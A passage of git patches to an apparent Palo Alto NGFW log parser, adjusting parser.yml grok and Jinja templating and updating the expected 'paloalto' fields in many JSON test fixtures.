+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
@@ -32,10 +32,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
index 9cb10263a..cd41f06d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
@@ -33,10 +33,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
index 2aa5ce29e..2130588d1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 51579bdcb..db55cc61a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
@@ -47,15 +47,9 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
-      "VirtualLocation": "vsys1",
       "threat": {
-        "id": "9999",
-        "type": "URL filtering log"
+        "id": "9999"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index eadb40265..196fc9c0c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
@@ -57,16 +57,10 @@
       "serial_number": "012345678910"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "320",
-      "DGHierarchyLevel2": "90",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys1",
       "threat": {
         "id": "95187",
-        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
-        "type": "custom threat"
+        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
index d2e4e4775..bc3ccb698 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
@@ -30,11 +30,6 @@
       "serial_number": "026701002348"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "general",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
index c0f834538..cc477a27e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
@@ -59,13 +59,7 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "Threat_ContentType": "end",
-      "URLCategory": "any",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
index cfa92faf3..72bc384fb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
@@ -59,13 +59,7 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "Threat_ContentType": "end",
-      "URLCategory": "any",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
index 2f58900ab..4657c725b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
index 9a1d42f34..b22a31f88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
index ea53d3353..9f659a601 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
index dee27d0e1..d2477e4f1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
@@ -30,14 +30,7 @@
       "serial_number": "01545100000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "0",
-      "Threat_ContentType": "login",
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1"
+      "Threat_ContentType": "login"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
index 23d0aaaf8..a3738eaf2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
@@ -32,10 +32,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
index c3b8bcffc..42b530f45 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index 57cb1121b..4e097a01e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
@@ -59,16 +59,9 @@
       "serial_number": "016401004874"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
-      "VirtualLocation": "vsys",
-      "VirtualSystemName": "VSYS",
       "threat": {
-        "id": "9999",
-        "type": "URL filtering log"
+        "id": "9999"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
index afc856776..207cd20b3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
@@ -72,24 +72,6 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
-      "PanOSContainerNameSpace": "pns_default",
-      "PanOSDestinationDeviceCategory": "X-Phone",
-      "PanOSDestinationDeviceHost": "pan-622",
-      "PanOSDestinationDeviceMac": "620797415366",
-      "PanOSDestinationDeviceModel": "MI",
-      "PanOSDestinationDeviceOSFamily": "A1",
-      "PanOSDestinationDeviceOSVersion": "Android v9.1",
-      "PanOSDestinationDeviceProfile": "x-profile",
-      "PanOSDestinationDeviceVendor": "Xiaomi",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSSourceDeviceHost": "pan-505",
-      "PanOSSourceDeviceModel": "Note 4G",
-      "PanOSSourceDeviceProfile": "x-profile",
-      "PanOSSourceDeviceVendor": "Lenovo",
-      "PanOSSourceLocation": "LY",
-      "PanOSThreatCategory": "unknown",
-      "PanOSThreatID": "27379(27379)",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index 20a78b306..cff329e0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
@@ -51,16 +51,10 @@
       "serial_number": "001701000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys",
       "threat": {
         "id": "34805",
-        "name": "PDF Exploit Evasion Found",
-        "type": "vulnerability exploit detection"
+        "name": "PDF Exploit Evasion Found"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
index 4fd068d08..b74fdb564 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
@@ -72,12 +72,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSessionStartTime": "Jul 31 2022 12:43:06",
-      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "LF-5698-NR"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
index a892a2a7b..1469faf57 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
@@ -72,12 +72,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSessionStartTime": "Aug 02 2022 06:41:44",
-      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
-      "URLCategory": "low-risk",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "GP cloud service"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
index 58c77fa30..9bf8bd0de 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
@@ -78,29 +78,6 @@
       "version": "2.0"
     },
     "paloalto": {
-      "PanOSContainerName": "pan-dp-77754f4",
-      "PanOSContainerNameSpace": "pns_default",
-      "PanOSDestinationDeviceCategory": "N-Phone",
-      "PanOSDestinationDeviceHost": "pan-355",
-      "PanOSDestinationDeviceMac": "530589561221",
-      "PanOSDestinationDeviceModel": "Nexus",
-      "PanOSDestinationDeviceOSFamily": "H1511",
-      "PanOSDestinationDeviceOSVersion": "Android v7",
-      "PanOSDestinationDeviceProfile": "n-profile",
-      "PanOSDestinationDeviceVendor": "Google",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSGPHostID": "xxxxxxxxxxxxxx",
-      "PanOSHASessionOwner": "session_owner-4",
-      "PanOSSessionStartTime": "Feb 27 2021 20:15:48",
-      "PanOSSourceDeviceHost": "pan-301",
-      "PanOSSourceDeviceModel": "Nexus",
-      "PanOSSourceDeviceProfile": "n-profile",
-      "PanOSSourceDeviceVendor": "Google",
-      "PanOSSourceDynamicAddressGroup": "aqua_dag",
-      "PanOSSourceLocation": "east-coast",
-      "PanOSX-Forwarded-ForIP": "1.1.1.1",
-      "URLCategory": "custom-category",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
index 3445ddc4f..1621cfeed 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
@@ -49,8 +49,7 @@
       "serial_number": "026701002040"
     },
     "paloalto": {
-      "Threat_ContentType": "end",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
index 3238eb5e4..324587ad2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
@@ -49,8 +49,7 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "deny",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "deny"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json
index 41d495725..f3a6b58d6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
@@ -77,25 +77,6 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
-      "PanOSContainerName": "pan-dp-77754f4",
-      "PanOSContainerNameSpace": "pns_default",
-      "PanOSDestinationDeviceCategory": "L-Phone",
-      "PanOSDestinationDeviceHost": "pan-506",
-      "PanOSDestinationDeviceMac": "150083646537",
-      "PanOSDestinationDeviceModel": "Note XT",
-      "PanOSDestinationDeviceOSFamily": "K8",
-      "PanOSDestinationDeviceOSVersion": "Android v8",
-      "PanOSDestinationDeviceProfile": "l-profile",
-      "PanOSDestinationDeviceVendor": "Lenovo",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSSourceDeviceHost": "pan-505",
-      "PanOSSourceDeviceModel": "Note 4G",
-      "PanOSSourceDeviceProfile": "l-profile",
-      "PanOSSourceDeviceVendor": "Lenovo",
-      "PanOSSourceDynamicAddressGroup": "blue_dag",
-      "PanOSSourceLocation": "west-coast",
-      "URLCategory": "sports",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json
index c90ab6ed6..ea8e442b5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json	
@@ -53,10 +53,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1"
-    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
index edd76521b..8c7d37227 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
@@ -60,13 +60,8 @@
       "serial_number": "111111111111"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "997",
-      "DGHierarchyLevel2": "738",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
       "Threat_ContentType": "wildfire",
-      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxx"
       },

From 6ce2c1b151887cb499e7b797784a3f6d3e5ef6f6 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 14:47:11 +0200
Subject: [PATCH 186/317] Fix raising errors in PaloAlto NGFW

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 84ad45ff1..79a12ce3b 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -436,6 +436,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.EventDescription}}"
         pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}"
         custom_patterns:
@@ -468,6 +469,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{parsed_event.message.Threat_ContentName}}"
         pattern: '%{DATA:threat_description}?\(%{NUMBER:threat_code}\)'
 

From e672bf5ba6d928e51da0228c78897a826875cd5b Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 16:39:58 +0200
Subject: [PATCH 187/317] Fix PaloAlto NGFW parser and tests

---
 .../paloalto-ngfw/ingest/parser.yml           | 16 ++++++-------
 .../paloalto-ngfw/tests/User_id_1_csv.json    |  9 +++++++-
 .../paloalto-ngfw/tests/User_id_2_csv.json    |  9 +++++++-
 .../paloalto-ngfw/tests/auth_cef.json         |  7 ++++++
 .../paloalto-ngfw/tests/decryption_cef.json   |  3 +++
 .../paloalto-ngfw/tests/file_cef.json         |  4 ++++
 .../paloalto-ngfw/tests/fix_bug_with_int.json |  3 ++-
 .../tests/fix_bug_without_int.json            |  3 ++-
 .../tests/globalprotect_cef.json              |  1 +
 .../tests/globalprotect_csv.json              |  2 ++
 .../tests/globalprotect_csv_2.json            |  2 ++
 .../paloalto-ngfw/tests/hip_match_cef.json    |  3 +++
 .../paloalto-ngfw/tests/icmp_allow_csv.json   |  3 ++-
 .../paloalto-ngfw/tests/iptag_cef.json        |  4 ++++
 .../tests/network_threat_alert_1.json         |  8 ++++++-
 .../tests/network_threat_alert_2.json         |  9 +++++++-
 .../paloalto-ngfw/tests/sctp_cef.json         |  4 ++++
 .../paloalto-ngfw/tests/system_csv.json       |  5 ++++
 .../paloalto-ngfw/tests/tcp_allow_csv.json    |  3 ++-
 .../tests/test_cloud_election_json.json       |  4 ++++
 .../tests/test_dhcp_renew_json.json           |  4 ++++
 .../tests/test_dns_proxy_json.json            |  4 ++++
 .../tests/test_file_alert_json.json           |  8 ++++++-
 .../tests/test_globalprotect.json             |  2 ++
 .../tests/test_installed_package_json.json    |  4 ++++
 .../tests/test_ldap_brute_force.json          |  5 ++++
 .../tests/test_new_file_type.json             |  8 ++++++-
 .../tests/test_new_globalprotect.json         |  5 ++++
 .../tests/test_new_threat_type.json           |  5 ++++
 .../tests/test_new_url_type.json              |  8 ++++++-
 .../tests/test_ntp_sync_json.json             |  4 ++++
 .../tests/test_port_up_json.json              |  4 ++++
 .../tests/test_registration_succeed_json.json |  4 ++++
 .../paloalto-ngfw/tests/test_system.json      |  5 ++++
 .../tests/test_system_event_10_json.json      |  4 ++++
 .../tests/test_system_event_11_json.json      |  4 ++++
 .../tests/test_system_event_12_json.json      |  4 ++++
 .../tests/test_system_event_1_json.json       |  4 ++++
 .../tests/test_system_event_2_json.json       |  4 ++++
 .../tests/test_system_event_3_json.json       |  4 ++++
 .../tests/test_system_event_4_json.json       |  4 ++++
 .../tests/test_system_event_5_json.json       |  4 ++++
 .../tests/test_system_event_6_json.json       |  4 ++++
 .../tests/test_system_event_7_json.json       |  4 ++++
 .../tests/test_system_event_8_json.json       |  4 ++++
 .../tests/test_system_event_9_json.json       |  4 ++++
 .../paloalto-ngfw/tests/test_threat.json      |  5 ++++
 .../paloalto-ngfw/tests/test_threat_02.json   |  5 ++++
 .../tests/test_timestamp_palo.json            |  5 ++++
 .../tests/test_traffic_event_1_json.json      |  8 ++++++-
 .../tests/test_traffic_event_2_json.json      |  8 ++++++-
 .../tests/test_update_content_json.json       |  4 ++++
 .../tests/test_upgrade_package_json.json      |  4 ++++
 .../tests/test_user_authentication_json.json  |  4 ++++
 .../paloalto-ngfw/tests/test_userid.json      |  9 +++++++-
 .../tests/test_web_authentication_json.json   |  4 ++++
 .../tests/test_wildfire_failure_json.json     |  4 ++++
 .../paloalto-ngfw/tests/threat-url-xff.json   |  6 +++++
 .../paloalto-ngfw/tests/threat_cef.json       | 18 +++++++++++++++
 .../paloalto-ngfw/tests/threat_csv.json       |  5 ++++
 .../paloalto-ngfw/tests/traffic1_csv.json     |  6 +++++
 .../paloalto-ngfw/tests/traffic2_csv.json     |  6 +++++
 .../paloalto-ngfw/tests/traffic_cef.json      | 23 +++++++++++++++++++
 .../tests/traffic_with_resotimestamp.json     |  3 ++-
 .../paloalto-ngfw/tests/udp_deny_csv.json     |  3 ++-
 .../paloalto-ngfw/tests/url_cef.json          | 19 +++++++++++++++
 .../paloalto-ngfw/tests/userid_cef.json       |  4 ++++
 .../paloalto-ngfw/tests/wildfire1_json.json   |  5 ++++
 68 files changed, 353 insertions(+), 25 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 79a12ce3b..835674257 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -717,16 +717,14 @@ stages:
           user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}"
           user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}"
           paloalto: >-
-            { 
-            {% set ns = namespace(first_iteration=True) %}
-            {% for key, value in parsed_event.message.items() %}
-            {% if value not in ["null", "", None] %}
-            {% if not ns.first_iteration %},{% endif %}
-            {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}}
-            {% set ns.first_iteration = false %}
-            {% endif %}
-            {% endfor %}
+            {
+              {%- for key, value in parsed_event.message.items() -%}
+                {%- if value not in ["null", "", None] -%}                  
+                  {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}},
+                {%- endif -%}
+              {%- endfor -%}
             }
+
           paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}"
           paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}"
           paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json
index dba765bd4..08c69d61f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
@@ -30,7 +30,14 @@
       "serial_number": "016401002222"
     },
     "paloalto": {
-      "Threat_ContentType": "login"
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys",
+      "VirtualSystemID": "1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
index 63c79e671..539963216 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
@@ -30,7 +30,14 @@
       "serial_number": "01640103000"
     },
     "paloalto": {
-      "Threat_ContentType": "login"
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys",
+      "VirtualSystemID": "1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
index 1b4a52135..ff12d8db6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
@@ -57,6 +57,13 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSourceDeviceHost": "src_host_list-0",
+      "PanOSSourceDeviceModel": "src_model_list-1",
+      "PanOSSourceDeviceProfile": "src_profile_list-1",
+      "PanOSSourceDeviceVendor": "src_vendor_list-1",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "xxxxx"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
index e213912c2..1a4fba4b4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
@@ -61,6 +61,9 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "ip": [
         "1.1.1.1"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
index 965583ed3..2da36f33e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
@@ -65,6 +65,10 @@
     },
     "paloalto": {
       "DirectionOfAttack": "client to server",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceLocation": "1.1.1.1-1.1.1.1",
+      "URLCategory": "any",
+      "VirtualLocation": "smtp",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
index 4dadbb51b..512ae89e7 100644
